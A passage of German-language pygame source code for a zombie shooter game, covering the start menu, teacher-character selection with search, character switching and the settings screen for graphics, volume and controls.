pygame.draw.line(game.screen, AUSWAHL_TEXT_COLOR, spielmodus_rect.midbottom, (int(game.WIDTH * 1 / 4), int(game.HEIGHT * 0.62)), 3)
pygame.draw.line(game.screen, AUSWAHL_TEXT_COLOR, spielmodus_rect.midbottom, (int(game.WIDTH * 2 / 4), int(game.HEIGHT * 0.62)), 3)
if game.genauerer_spielmodus == AFTER_TIME and not loading:
if cursor_pos[0] == 3 and cursor_pos[1] <= int(max([len(MAP_NAMES) - 1, 4]) / 2):
return_dict[AFTER_TIME + "0"] = draw_text(game.screen, "Zombiewelle nach", game.NORMAL_TEXT, int(game.WIDTH * 1 / 4), int(game.HEIGHT * 0.62), color=AUSWAHL_TEXT_GREEN_SELECTED, rect_place="oben_mitte")
return_dict[AFTER_TIME + "1"] = draw_text(game.screen, "Zeit", game.NORMAL_TEXT, int(game.WIDTH * 1 / 4), int(game.HEIGHT * 0.62) + game.NORMAL_TEXT + 5, color=AUSWAHL_TEXT_GREEN_SELECTED, rect_place="oben_mitte")
else:
return_dict[AFTER_TIME + "0"] = draw_text(game.screen, "Zombiewelle nach", game.NORMAL_TEXT, int(game.WIDTH * 1 / 4), int(game.HEIGHT * 0.62), color=AUSWAHL_TEXT_GREEN, rect_place="oben_mitte")
return_dict[AFTER_TIME + "1"] = draw_text(game.screen, "Zeit", game.NORMAL_TEXT, int(game.WIDTH * 1 / 4), int(game.HEIGHT * 0.62) + game.NORMAL_TEXT + 5, color=AUSWAHL_TEXT_GREEN, rect_place="oben_mitte")
elif cursor_pos[0] == 3 and cursor_pos[1] <= int(max([len(MAP_NAMES) - 1, 4]) / 2):
return_dict[AFTER_TIME + "0"] = draw_text(game.screen, "Zombiewelle nach", game.NORMAL_TEXT, int(game.WIDTH * 1 / 4), int(game.HEIGHT * 0.62), color=AUSWAHL_TEXT_SELECTED, rect_place="oben_mitte")
return_dict[AFTER_TIME + "1"] = draw_text(game.screen, "Zeit", game.NORMAL_TEXT, int(game.WIDTH * 1 / 4), int(game.HEIGHT * 0.62) + game.NORMAL_TEXT + 5, color=AUSWAHL_TEXT_SELECTED, rect_place="oben_mitte")
else:
return_dict[AFTER_TIME + "0"] = draw_text(game.screen, "Zombiewelle nach", game.NORMAL_TEXT, int(game.WIDTH * 1 / 4), int(game.HEIGHT * 0.62), color=AUSWAHL_TEXT_COLOR, rect_place="oben_mitte")
return_dict[AFTER_TIME + "1"] = draw_text(game.screen, "Zeit", game.NORMAL_TEXT, int(game.WIDTH * 1 / 4), int(game.HEIGHT * 0.62) + game.NORMAL_TEXT + 5, color=AUSWAHL_TEXT_COLOR, rect_place="oben_mitte")
if game.genauerer_spielmodus == AFTER_KILLED and not loading:
if cursor_pos[0] == 3 and cursor_pos[1] > int(max([len(MAP_NAMES) - 1, 4]) / 2):
return_dict[AFTER_KILLED + "0"] = draw_text(game.screen, "Zombiewelle nach", game.NORMAL_TEXT, int(game.WIDTH * 2 / 4), int(game.HEIGHT * 0.62), color=AUSWAHL_TEXT_GREEN_SELECTED, rect_place="oben_mitte")
return_dict[AFTER_KILLED + "1"] = draw_text(game.screen, "töten aller Zombies", game.NORMAL_TEXT, int(game.WIDTH * 2 / 4), int(game.HEIGHT * 0.62) + game.NORMAL_TEXT + 5, color=AUSWAHL_TEXT_GREEN_SELECTED, rect_place="oben_mitte")
else:
return_dict[AFTER_KILLED + "0"] = draw_text(game.screen, "Zombiewelle nach", game.NORMAL_TEXT, int(game.WIDTH * 2 / 4), int(game.HEIGHT * 0.62), color=AUSWAHL_TEXT_GREEN, rect_place="oben_mitte")
return_dict[AFTER_KILLED + "1"] = draw_text(game.screen, "töten aller Zombies", game.NORMAL_TEXT, int(game.WIDTH * 2 / 4), int(game.HEIGHT * 0.62) + game.NORMAL_TEXT + 5, color=AUSWAHL_TEXT_GREEN, rect_place="oben_mitte")
elif cursor_pos[0] == 3 and cursor_pos[1] > int(max([len(MAP_NAMES) - 1, 4]) / 2):
return_dict[AFTER_KILLED + "0"] = draw_text(game.screen, "Zombiewelle nach", game.NORMAL_TEXT, int(game.WIDTH * 2 / 4), int(game.HEIGHT * 0.62), color=AUSWAHL_TEXT_SELECTED, rect_place="oben_mitte")
return_dict[AFTER_KILLED + "1"] = draw_text(game.screen, "töten aller Zombies", game.NORMAL_TEXT, int(game.WIDTH * 2 / 4), int(game.HEIGHT * 0.62) + game.NORMAL_TEXT + 5, color=AUSWAHL_TEXT_SELECTED, rect_place="oben_mitte")
else:
return_dict[AFTER_KILLED + "0"] = draw_text(game.screen, "Zombiewelle nach", game.NORMAL_TEXT, int(game.WIDTH * 2 / 4), int(game.HEIGHT * 0.62), color=AUSWAHL_TEXT_COLOR, rect_place="oben_mitte")
return_dict[AFTER_KILLED + "1"] = draw_text(game.screen, "töten aller Zombies", game.NORMAL_TEXT, int(game.WIDTH * 2 / 4), int(game.HEIGHT * 0.62) + game.NORMAL_TEXT + 5, color=AUSWAHL_TEXT_COLOR, rect_place="oben_mitte")
# Karte
draw_text(game.screen, "KARTE", int(game.BIG_TEXT * 1.2), int(game.WIDTH / 2), int(game.HEIGHT * 0.74), color=AUSWAHL_TEXT_COLOR)
for map_count, karten_name in enumerate(MAP_NAMES):
if game.map_name == karten_name and not loading:
if cursor_pos[0] == 4 and (cursor_pos[1] == map_count or map_count == len(MAP_NAMES) - 1 and cursor_pos[1] > len(MAP_NAMES) - 1):
return_dict["Map" + str(map_count)] = draw_text(game.screen, karten_name, game.NORMAL_TEXT, int(game.WIDTH * (map_count + 1) / (len(MAP_NAMES) + 1)), int(game.HEIGHT * 0.84), color=AUSWAHL_TEXT_GREEN_SELECTED, rect_place="mitte")
else:
return_dict["Map" + str(map_count)] = draw_text(game.screen, karten_name, game.NORMAL_TEXT, int(game.WIDTH * (map_count + 1) / (len(MAP_NAMES) + 1)), int(game.HEIGHT * 0.84), color=AUSWAHL_TEXT_GREEN, rect_place="mitte")
elif cursor_pos[0] == 4 and (cursor_pos[1] == map_count or map_count == len(MAP_NAMES) - 1 and cursor_pos[1] > len(MAP_NAMES) - 1):
return_dict["Map" + str(map_count)] = draw_text(game.screen, karten_name, game.NORMAL_TEXT, int(game.WIDTH * (map_count + 1) / (len(MAP_NAMES) + 1)), int(game.HEIGHT * 0.84), color=AUSWAHL_TEXT_SELECTED, rect_place="mitte")
else:
return_dict["Map" + str(map_count)] = draw_text(game.screen, karten_name, game.NORMAL_TEXT, int(game.WIDTH * (map_count + 1) / (len(MAP_NAMES) + 1)), int(game.HEIGHT * 0.84), color=AUSWAHL_TEXT_COLOR, rect_place="mitte")
if loading:
draw_text(game.screen, "Lädt ...", game.HUGE_TEXT, int(game.WIDTH / 2), int(game.HEIGHT * 0.94), rect_place="mitte", color=AUSWAHL_TEXT_RED)
else:
return_dict["Spielen"] = draw_text(game.screen, "Spielen", game.HUGE_TEXT, int(game.WIDTH / 2), int(game.HEIGHT * 0.94), rect_place="mitte", color=AUSWAHL_TEXT_COLOR)
pygame.display.flip()
return return_dict
def make_start_game_selection(game):
cursor_pos = [1, 0]
time_last_cursor_change = time()
while True:
game.clock.tick(FPS)
maus_rects = draw_start_game_screen(game,cursor_pos)
pressed = game.check_key_or_mouse_pressed([pygame.K_SPACE, pygame.K_UP, pygame.K_DOWN, pygame.K_LEFT, pygame.K_RIGHT, pygame.K_s, pygame.K_d])
if MAUS_LEFT in pressed["Tastatur"]:
if game.check_maus_pos_on_rect(pressed["Tastatur"][MAUS_LEFT], maus_rects["Hilfe"]):
make_spielerklaerung(game)
if game.check_maus_pos_on_rect(pressed["Tastatur"][MAUS_LEFT], maus_rects["Einstellungen"]):
make_einstellungen(game)
for schwierigkeitsstufe in range(1, 6):
if game.check_maus_pos_on_rect(pressed["Tastatur"][MAUS_LEFT], maus_rects["Schwierigkeit_" + str(schwierigkeitsstufe)]):
game.schwierigkeit = schwierigkeitsstufe
if game.check_maus_pos_on_rect(pressed["Tastatur"][MAUS_LEFT], maus_rects[MAP_MODUS]):
game.spielmodus = MAP_MODUS
if game.check_maus_pos_on_rect(pressed["Tastatur"][MAUS_LEFT], maus_rects[ARENA_MODUS]):
game.spielmodus = ARENA_MODUS
if game.check_maus_pos_on_rect(pressed["Tastatur"][MAUS_LEFT], maus_rects[AFTER_TIME + "0"]) or game.check_maus_pos_on_rect(pressed["Tastatur"][MAUS_LEFT], maus_rects[AFTER_TIME + "1"]):
game.genauerer_spielmodus = AFTER_TIME
if game.check_maus_pos_on_rect(pressed["Tastatur"][MAUS_LEFT], maus_rects[AFTER_KILLED + "0"]) or game.check_maus_pos_on_rect(pressed["Tastatur"][MAUS_LEFT], maus_rects[AFTER_KILLED + "1"]):
game.genauerer_spielmodus = AFTER_KILLED
for map_count, karten_name in enumerate(MAP_NAMES):
if game.check_maus_pos_on_rect(pressed["Tastatur"][MAUS_LEFT], maus_rects["Map" + str(map_count)]):
game.map_name = karten_name
if game.check_key_in_pressed(MAUS_ROLL_UP, pressed) and time() - time_last_cursor_change > 0.8:
time_last_cursor_change = time()
game.schwierigkeit += 1
if game.schwierigkeit > 5:
game.schwierigkeit = 5
if game.check_key_in_pressed(MAUS_ROLL_DOWN, pressed) and time() - time_last_cursor_change > 0.8:
time_last_cursor_change = time()
game.schwierigkeit -= 1
if game.schwierigkeit < 1:
game.schwierigkeit = 1
if game.check_key_in_pressed(pygame.K_UP, pressed) and time() - time_last_cursor_change > 0.8:
time_last_cursor_change = time()
cursor_pos[0] = max([cursor_pos[0] - 1, 0])
if game.check_key_in_pressed(pygame.K_DOWN, pressed) and time() - time_last_cursor_change > 0.8:
time_last_cursor_change = time()
cursor_pos[0] = min([cursor_pos[0] + 1, 4])
if game.check_key_in_pressed(pygame.K_LEFT, pressed) and time() - time_last_cursor_change > 0.8:
time_last_cursor_change = time()
if cursor_pos[0] == 0 or cursor_pos[0] == 2 or cursor_pos[0] == 3:
cursor_pos[1] = 0
else:
cursor_pos[1] = max([cursor_pos[1] - 1, 0])
if game.check_key_in_pressed(pygame.K_RIGHT, pressed) and time() - time_last_cursor_change > 0.8:
time_last_cursor_change = time()
if cursor_pos[0] == 0 or cursor_pos[0] == 2 or cursor_pos[0] == 3:
cursor_pos[1] = max([len(MAP_NAMES) - 1, 4])
else:
cursor_pos[1] = min([cursor_pos[1] + 1, max([len(MAP_NAMES) - 1, 4])])
if game.check_key_in_pressed(pygame.K_s, pressed) or game.check_key_in_pressed(pygame.K_d, pressed) and time() - time_last_cursor_change > 0.8:
time_last_cursor_change = time()
if cursor_pos[0] == 0:
if cursor_pos[1] > int(max([len(MAP_NAMES) - 1, 4]) / 2):
make_spielerklaerung(game)
else:
make_einstellungen(game)
if cursor_pos[0] == 1:
game.schwierigkeit = min([cursor_pos[1] + 1, 5])
if cursor_pos[0] == 2:
if cursor_pos[1] > int(max([len(MAP_NAMES) - 1, 4]) / 2):
game.spielmodus = MAP_MODUS
else:
game.spielmodus = ARENA_MODUS
if cursor_pos[0] == 3:
if cursor_pos[1] > int(max([len(MAP_NAMES) - 1, 4]) / 2):
game.genauerer_spielmodus = AFTER_KILLED
else:
game.genauerer_spielmodus = AFTER_TIME
if cursor_pos[0] == 4:
game.map_name = MAP_NAMES[min([cursor_pos[1], len(MAP_NAMES) - 1])]
if (MAUS_LEFT in pressed["Tastatur"] and game.check_maus_pos_on_rect(pressed["Tastatur"][MAUS_LEFT], maus_rects["Spielen"])) or game.check_key_in_pressed(pygame.K_SPACE, pressed):
for player_num in range(len(game.players)):
game.paused[player_num] = False
game.clock.tick(FPS)
draw_start_game_screen(game,[-1,-1],True)
game.check_key_or_mouse_pressed()
if game.map_name == "Toturial":
game.spielmodus = TUTORIAL
break
# Lehrerauswahl
def draw_lehrer_selection(game, surf, selected, player_num, such_text=""):
return_dict = {}
if game.multiplayer:
linker_rand = int(game.WIDTH / len(game.players) * player_num)
lehrer_asuwahl_breite = int(game.WIDTH / len(game.players))
else:
linker_rand = 0
lehrer_asuwahl_breite = game.WIDTH
subsurface = game.background.subsurface((linker_rand, 0, int(game.WIDTH / len(game.players)), game.HEIGHT))
subsurface_rect = subsurface.get_rect()
surf.blit(subsurface, (subsurface_rect.x + linker_rand, subsurface_rect.y))
if such_text == "":
untere_kante_letzter_lehrer = 0
else:
draw_text(surf, "Suche: " + such_text, game.BIG_TEXT, linker_rand + 10, 10, rect_place="oben_links", color=AUSWAHL_TEXT_COLOR)
pygame.draw.line(surf, LEHRER_AUSWAHL_LINE_COLOR, (linker_rand, game.BIG_TEXT + 20), (linker_rand + lehrer_asuwahl_breite, game.BIG_TEXT + 20), 3)
untere_kante_letzter_lehrer = game.BIG_TEXT + 20
if selected not in LEHRER:
lehrer = LEHRER_NAMEN[len(LEHRER_NAMEN) - 1]
else:
if LEHRER_NAMEN.index(selected) - 1 < 0:
lehrer = LEHRER_NAMEN[len(LEHRER_NAMEN) - 1]
else:
lehrer = LEHRER_NAMEN[LEHRER_NAMEN.index(selected) - 1]
is_there_a_match = False
for name in LEHRER_NAMEN:
anderer_spieler_hat_schon_diese_person = False
unlocked = True
passt_zu_suche = True
if game.multiplayer:
for count, player in enumerate(game.players):
if player.lehrer_name == name and count != player_num:
anderer_spieler_hat_schon_diese_person = True
if LEHRER[name]["bedingungen_fuer_unlock"] != None:
unlocked = name in game.lehrer_unlocked_sofar
if such_text != "":
if not such_text.lower() in name.lower():
passt_zu_suche = False
if anderer_spieler_hat_schon_diese_person == False and unlocked == True and passt_zu_suche == True:
is_there_a_match = True
if not is_there_a_match:
draw_text(surf, "kein Suchergebnis", game.BIG_TEXT, linker_rand + 10, untere_kante_letzter_lehrer + 20, rect_place="oben_links", color=AUSWAHL_TEXT_COLOR)
pygame.display.flip()
return []
while True:
if LEHRER_NAMEN.index(lehrer) + 1 >= len(LEHRER_NAMEN):
lehrer = LEHRER_NAMEN[0]
else:
lehrer = LEHRER_NAMEN[LEHRER_NAMEN.index(lehrer) + 1]
while True:
anderer_spieler_hat_schon_diese_person = False
unlocked = True
passt_zu_suche = True
if game.multiplayer:
for count, player in enumerate(game.players):
if player.lehrer_name == lehrer and count != player_num:
anderer_spieler_hat_schon_diese_person = True
if LEHRER[lehrer]["bedingungen_fuer_unlock"] != None:
unlocked = lehrer in game.lehrer_unlocked_sofar
if such_text != "":
if not such_text.lower() in lehrer.lower():
passt_zu_suche = False
if anderer_spieler_hat_schon_diese_person == False and unlocked == True and passt_zu_suche == True:
break
else:
if LEHRER_NAMEN.index(lehrer) + 1 >= len(LEHRER_NAMEN):
lehrer = LEHRER_NAMEN[0]
else:
lehrer = LEHRER_NAMEN[LEHRER_NAMEN.index(lehrer) + 1]
if lehrer not in return_dict.values():
start_hoehe_dieses_lehrer = untere_kante_letzter_lehrer
game.screen.blit(game.lehrer_selection_surfaces[lehrer], (linker_rand, start_hoehe_dieses_lehrer))
untere_kante_letzter_lehrer = start_hoehe_dieses_lehrer + game.lehrer_selection_surfaces[lehrer].get_height()
untere_kante_letzter_lehrer += 10
if untere_kante_letzter_lehrer >= game.HEIGHT:
break
return_dict[(start_hoehe_dieses_lehrer, untere_kante_letzter_lehrer)] = lehrer
# Linie
pygame.draw.line(surf, LEHRER_AUSWAHL_LINE_COLOR, (linker_rand, untere_kante_letzter_lehrer), (linker_rand + lehrer_asuwahl_breite, untere_kante_letzter_lehrer), 2)
else:
break
pygame.display.flip()
return return_dict
def make_lehrer_selection(game, surf, player_num):
draw_lehrer_selection(game,surf, None, player_num)
alter_lehrer = game.players[player_num].lehrer_name
selected_lehrer_num = list(LEHRER).index(alter_lehrer)
draw_lehrer_selection(game,surf, list(LEHRER)[selected_lehrer_num], player_num)
last_selection_change = time()
such_text = ""
while True:
lehrer_y_positions = draw_lehrer_selection(game, surf, list(LEHRER)[selected_lehrer_num], player_num, such_text)
pressed = game.check_key_or_mouse_pressed([pygame.K_RETURN, pygame.K_s, pygame.K_d, pygame.K_a, pygame.K_DOWN, pygame.K_UP, pygame.K_BACKSPACE, "text"])
# Auswahl aendern
if (game.check_key_in_pressed(pygame.K_UP, pressed) or MAUS_ROLL_UP in pressed["Tastatur"]) and time() - last_selection_change > 0.2 and lehrer_y_positions != []:
# Lehrer auswahl aendern, dabei darauf achten das Lehrer schon freigeschaltet ist und noch nicht von anderen Spielern ausgewaehlt wurde
last_selection_change = time()
if selected_lehrer_num > 0:
selected_lehrer_num -= 1
else:
selected_lehrer_num = len(LEHRER_NAMEN) - 1
while True:
anderer_spieler_hat_schon_diese_person = False
unlocked = True
passt_zu_suche = True
if game.multiplayer:
for count, player in enumerate(game.players):
if player.lehrer_name == LEHRER_NAMEN[selected_lehrer_num] and count != player_num:
anderer_spieler_hat_schon_diese_person = True
if LEHRER[LEHRER_NAMEN[selected_lehrer_num]]["bedingungen_fuer_unlock"] != None:
unlocked = LEHRER_NAMEN[selected_lehrer_num] in game.lehrer_unlocked_sofar
if such_text != "":
if not such_text.lower() in LEHRER_NAMEN[selected_lehrer_num].lower():
passt_zu_suche = False
if anderer_spieler_hat_schon_diese_person == False and unlocked == True and passt_zu_suche == True:
break
else:
if selected_lehrer_num > 0:
selected_lehrer_num -= 1
else:
selected_lehrer_num = len(LEHRER_NAMEN) - 1
if (game.check_key_in_pressed(pygame.K_DOWN, pressed) or MAUS_ROLL_DOWN in pressed["Tastatur"]) and time() - last_selection_change > 0.2 and lehrer_y_positions != []:
# Lehrer auswahl aendern, dabei darauf chaten das Lehrer schon freigeschaltet ist und noch nicht von anderen Spielern ausgewaehlt wurde
last_selection_change = time()
if selected_lehrer_num < len(list(LEHRER)) - 1:
selected_lehrer_num += 1
else:
selected_lehrer_num = 0
while True:
anderer_spieler_hat_schon_diese_person = False
unlocked = True
passt_zu_suche = True
if game.multiplayer:
for count, player in enumerate(game.players):
if player.lehrer_name == LEHRER_NAMEN[selected_lehrer_num] and count != player_num:
anderer_spieler_hat_schon_diese_person = True
if LEHRER[LEHRER_NAMEN[selected_lehrer_num]]["bedingungen_fuer_unlock"] != None:
unlocked = LEHRER_NAMEN[selected_lehrer_num] in game.lehrer_unlocked_sofar
if such_text != "":
if not such_text.lower() in LEHRER_NAMEN[selected_lehrer_num].lower():
passt_zu_suche = False
if anderer_spieler_hat_schon_diese_person == False and unlocked == True and passt_zu_suche == True:
break
else:
if selected_lehrer_num < len(list(LEHRER)) - 1:
selected_lehrer_num += 1
else:
selected_lehrer_num = 0
# Nach Lehrer suchen durch Text eingeben
if pressed["Tastatur"]["text"] != False:
such_text += pressed["Tastatur"]["text"]
if pressed["Tastatur"][pygame.K_BACKSPACE]:
such_text = such_text[:-2]
# Auswaehlen
if MAUS_LEFT in pressed["Tastatur"]:
for lehrer_y_position in lehrer_y_positions:
if pressed["Tastatur"][MAUS_LEFT][1] < lehrer_y_position[1] and pressed["Tastatur"][MAUS_LEFT][1] > lehrer_y_position[0]:
change_to_other_lehrer(game,lehrer_y_positions[lehrer_y_position], alter_lehrer, game.players[player_num])
game.paused[player_num] = False
return
elif game.check_key_in_pressed(pygame.K_s, pressed) or game.check_key_in_pressed(pygame.K_d, pressed):
change_to_other_lehrer(game,LEHRER_NAMEN[selected_lehrer_num], alter_lehrer, game.players[player_num])
game.paused[player_num] = False
return
# Zurueck
if game.check_key_in_pressed(pygame.K_a, pressed):
game.paused[player_num] = False
return
def change_to_other_lehrer(game, lehrer_name, alter_lehrer, player):
game.werte_since_last_lehrer_change[player] = {"shoots": 0, "treffer": 0, "collected_objects": 0, "num_obstacles_stept_on": 0, "time_lehrer_change": time(), "zombies_killed": 0, "collected_health_packs": 0, "num_power_ups": 0}
player.lehrer_name = lehrer_name
player.weapon_upgrade_unlocked = False
player.update_image()
if player.health / LEHRER[alter_lehrer]["player_health"] * LEHRER[player.lehrer_name]["player_health"] > LEHRER[player.lehrer_name]["player_health"]:
player.health = LEHRER[player.lehrer_name]["player_health"]
else:
player.health = player.health / LEHRER[alter_lehrer]["player_health"] * LEHRER[player.lehrer_name]["player_health"]
for obstacle in game.personen_obstacles:
obstacle.update_image()
for object in game.personen_objects:
object.update_image()
for zombie in game.zombies:
zombie.update_image()
update_live_bar_image(game,player, game.players.index(player))
update_forground_text_img(game)
# Einstellungen
def draw_einstellungen(game, cursor_pos):
return_dict = {}
game.screen.blit(game.background, (0, 0))
# Einstellungen
draw_text(game.screen, "Einstellungen", game.GIANT_TEXT, int(game.WIDTH / 2), int(game.HEIGHT * 0.13), rect_place="mitte", color=AUSWAHL_TEXT_COLOR)
# Schoene oder fluessige Grafik
if game.schoene_grafik:
if cursor_pos[0] == 0:
return_dict["Grafik"] = draw_text(game.screen, "schöne Grafik", game.NORMAL_TEXT, int(game.WIDTH / 2), int(game.HEIGHT * 0.25), rect_place="oben_mitte", color=AUSWAHL_TEXT_SELECTED)
else:
return_dict["Grafik"] = draw_text(game.screen, "schöne Grafik", game.NORMAL_TEXT, int(game.WIDTH / 2), int(game.HEIGHT * 0.25), rect_place="oben_mitte", color=AUSWAHL_TEXT_COLOR)
else:
if cursor_pos[0] == 0:
return_dict["Grafik"] = draw_text(game.screen, "flüssige Grafik", game.NORMAL_TEXT, int(game.WIDTH / 2), int(game.HEIGHT * 0.25), rect_place="oben_mitte", color=AUSWAHL_TEXT_SELECTED)
else:
return_dict["Grafik"] = draw_text(game.screen, "flüssige Grafik", game.NORMAL_TEXT, int(game.WIDTH / 2), int(game.HEIGHT * 0.25), rect_place="oben_mitte", color=AUSWAHL_TEXT_COLOR)
# Lautsaerke
draw_text(game.screen, "Musik ", game.NORMAL_TEXT, int(game.WIDTH / 4), int(game.HEIGHT * 0.38), rect_place="mitte_rechts", color=AUSWAHL_TEXT_COLOR)
pygame.draw.line(game.screen, AUSWAHL_TEXT_COLOR, (int(game.WIDTH/4), int(game.HEIGHT*0.38)), (int(game.WIDTH*(3/4)),int(game.HEIGHT*0.38)), 5)
pygame.draw.circle(game.screen,AUSWAHL_TEXT_GREEN,(int(game.WIDTH/4+(game.WIDTH/2)*game.music_volume),int(game.HEIGHT * 0.38)),10)
draw_text(game.screen, "Sounds ", game.NORMAL_TEXT, int(game.WIDTH / 4), int(game.HEIGHT * 0.43), rect_place="mitte_rechts", color=AUSWAHL_TEXT_COLOR)
pygame.draw.line(game.screen, AUSWAHL_TEXT_COLOR, (int(game.WIDTH/4), int(game.HEIGHT*0.43)), (int(game.WIDTH*(3/4)),int(game.HEIGHT*0.43)), 5)
pygame.draw.circle(game.screen,AUSWAHL_TEXT_GREEN,(int(game.WIDTH/4+(game.WIDTH/2)*game.sound_volume),int(game.HEIGHT * 0.43)),10)
if cursor_pos[0] == 1 and cursor_pos[1] == 0:
return_dict["Musik -"] = draw_text(game.screen, "- ", game.NORMAL_TEXT, int(game.WIDTH / 4), int(game.HEIGHT * 0.38), rect_place="mitte_rechts", color=AUSWAHL_TEXT_SELECTED)
else:
return_dict["Musik -"] = draw_text(game.screen, "- ", game.NORMAL_TEXT, int(game.WIDTH / 4), int(game.HEIGHT * 0.38), rect_place="mitte_rechts", color=AUSWAHL_TEXT_COLOR)
if cursor_pos[0] == 1 and cursor_pos[1] == 1:
return_dict["Musik +"] = draw_text(game.screen, " +", game.NORMAL_TEXT, int(game.WIDTH*(3/4)), int(game.HEIGHT * 0.38), rect_place="mitte_links", color=AUSWAHL_TEXT_SELECTED)
else:
return_dict["Musik +"] = draw_text(game.screen, " +", game.NORMAL_TEXT, int(game.WIDTH*(3/4)), int(game.HEIGHT * 0.38), rect_place="mitte_links", color=AUSWAHL_TEXT_COLOR)
if cursor_pos[0] == 2 and cursor_pos[1] == 0:
return_dict["Sounds -"] = draw_text(game.screen, "- ", game.NORMAL_TEXT, int(game.WIDTH / 4), int(game.HEIGHT * 0.43), rect_place="mitte_rechts", color=AUSWAHL_TEXT_SELECTED)
else:
return_dict["Sounds -"] = draw_text(game.screen, "- ", game.NORMAL_TEXT, int(game.WIDTH / 4), int(game.HEIGHT * 0.43), rect_place="mitte_rechts", color=AUSWAHL_TEXT_COLOR)
if cursor_pos[0] == 2 and cursor_pos[1] == 1:
return_dict["Sounds +"] = draw_text(game.screen, " +", game.NORMAL_TEXT, int(game.WIDTH*(3/4)), int(game.HEIGHT * 0.43), rect_place="mitte_links", color=AUSWAHL_TEXT_SELECTED)
else:
return_dict["Sounds +"] = draw_text(game.screen, " +", game.NORMAL_TEXT, int(game.WIDTH*(3/4)), int(game.HEIGHT * 0.43), rect_place="mitte_links", color=AUSWAHL_TEXT_COLOR)
# Tastatur und Maus
if game.use_tastatur and len(game.all_joysticks) > 0:
if cursor_pos[0] == 3 and cursor_pos[1] == 0:
return_dict["Tastatur"] = draw_text(game.screen, "Tastatur ", game.NORMAL_TEXT, int(game.WIDTH / 2), int(game.HEIGHT * 0.55), rect_place="oben_rechts", color=AUSWAHL_TEXT_GREEN_SELECTED)
else:
return_dict["Tastatur"] = draw_text(game.screen, "Tastatur ", game.NORMAL_TEXT, int(game.WIDTH / 2), int(game.HEIGHT * 0.55), rect_place="oben_rechts", color=AUSWAHL_TEXT_GREEN)
else:
if cursor_pos[0] == 3 and cursor_pos[1] == 0 and len(game.all_joysticks) > 0:
return_dict["Tastatur"] = draw_text(game.screen, "Tastatur ", game.NORMAL_TEXT, int(game.WIDTH / 2), int(game.HEIGHT * 0.55), rect_place="oben_rechts", color=AUSWAHL_TEXT_SELECTED)
else:
return_dict["Tastatur"] = draw_text(game.screen, "Tastatur ", game.NORMAL_TEXT, int(game.WIDTH / 2), int(game.HEIGHT * 0.55), rect_place="oben_rechts", color=AUSWAHL_TEXT_COLOR)
if game.with_maussteuerung:
if cursor_pos[0] == 3 and (cursor_pos[1] == 1 or len(game.all_joysticks) == 0):
return_dict["Maus"] = draw_text(game.screen, " Maussteuerung", game.NORMAL_TEXT, int(game.WIDTH / 2), int(game.HEIGHT * 0.55), rect_place="oben_links", color=AUSWAHL_TEXT_SELECTED)
else:
return_dict["Maus"] = draw_text(game.screen, " Maussteuerung", game.NORMAL_TEXT, int(game.WIDTH / 2), int(game.HEIGHT * 0.55), rect_place="oben_links", color=AUSWAHL_TEXT_COLOR)
else:
if cursor_pos[0] == 3 and (cursor_pos[1] == 1 or len(game.all_joysticks) == 0):
return_dict["Maus"] = draw_text(game.screen, " Tastatursteuerung", game.NORMAL_TEXT, int(game.WIDTH / 2), int(game.HEIGHT * 0.55), rect_place="oben_links", color=AUSWAHL_TEXT_SELECTED)
else:
return_dict["Maus"] = draw_text(game.screen, " Tastatursteuerung", game.NORMAL_TEXT, int(game.WIDTH / 2), int(game.HEIGHT * 0.55), rect_place="oben_links", color=AUSWAHL_TEXT_COLOR)
# Joysticks
return_dict["Joystick"] = []
for count, joystick in enumerate(game.all_joysticks):
if joystick in game.used_joysticks:
if cursor_pos[0] - 4 == count:
return_dict["Joystick"].append(draw_text(game.screen, joystick.get_name(), game.NORMAL_TEXT, int(game.WIDTH / 2), int(game.HEIGHT * 0.55 + (count + 1) * (game.NORMAL_TEXT + 12)), rect_place="oben_mitte", color=AUSWAHL_TEXT_GREEN_SELECTED))
else:
return_dict["Joystick"].append(draw_text(game.screen, joystick.get_name(), game.NORMAL_TEXT, int(game.WIDTH / 2), int(game.HEIGHT * 0.55 + (count + 1) * (game.NORMAL_TEXT + 12)), rect_place="oben_mitte", color=AUSWAHL_TEXT_GREEN))
elif cursor_pos[0] - 4 == count:
return_dict["Joystick"].append(draw_text(game.screen, joystick.get_name(), game.NORMAL_TEXT, int(game.WIDTH / 2), int(game.HEIGHT * 0.55 + (count + 1) * (game.NORMAL_TEXT + 12)), rect_place="oben_mitte", color=AUSWAHL_TEXT_SELECTED))
else:
return_dict["Joystick"].append(draw_text(game.screen, joystick.get_name(), game.NORMAL_TEXT, int(game.WIDTH / 2), int(game.HEIGHT * 0.55 + (count + 1) * (game.NORMAL_TEXT + 12)), rect_place="oben_mitte", color=AUSWAHL_TEXT_COLOR))
# Fentergroesse anpassen
if cursor_pos[0] == len(game.all_joysticks) + 4:
return_dict["Fenstergroesse"] = draw_text(game.screen, "Fenstergröße an Anzahl der Spieler anpassen", game.NORMAL_TEXT, int(game.WIDTH / 2), int(game.HEIGHT - 2 * game.NORMAL_TEXT - 20), rect_place="unten_mitte", color=AUSWAHL_TEXT_SELECTED)
else:
return_dict["Fenstergroesse"] = draw_text(game.screen, "Fenstergröße an Anzahl der Spieler anpassen", game.NORMAL_TEXT, int(game.WIDTH / 2), int(game.HEIGHT - 2 * game.NORMAL_TEXT - 20), rect_place="unten_mitte", color=AUSWAHL_TEXT_COLOR)
# zurueck
return_dict["zurueck"] = draw_text(game.screen, "zurück", game.NORMAL_TEXT, int(game.WIDTH / 2), int(game.HEIGHT - game.NORMAL_TEXT), rect_place="unten_mitte", color=AUSWAHL_TEXT_COLOR)
pygame.display.flip()
return return_dict
def make_einstellungen(game):
def change_sound_volume(volume):
for sound_name in WEAPON_WAVS:
WEAPON_WAVS[sound_name].set_volume(volume)
LEVEL_START_WAV.set_volume(volume)
for sound in ZOMBIE_WAVS:
sound.set_volume(volume)
for sound in ZOMBIE_HIT_WAVS:
sound.set_volume(volume)
for sound in PLAYER_HIT_WAVS:
sound.set_volume(volume)
cursor_pos = [0, 0]
time_last_cursor_change = time()
while True:
game.clock.tick(FPS)
maus_rects = draw_einstellungen(game,cursor_pos)
pressed = game.check_key_or_mouse_pressed([pygame.K_LEFT, pygame.K_RIGHT, pygame.K_UP, pygame.K_DOWN, pygame.K_RETURN, pygame.K_a, pygame.K_s, pygame.K_d])
if MAUS_LEFT in pressed["Tastatur"]:
if game.check_maus_pos_on_rect(pressed["Tastatur"][MAUS_LEFT], maus_rects["Grafik"]):
if game.schoene_grafik:
game.schoene_grafik = False
else:
game.schoene_grafik = True
if game.check_maus_pos_on_rect(pressed["Tastatur"][MAUS_LEFT], maus_rects["Musik +"]):
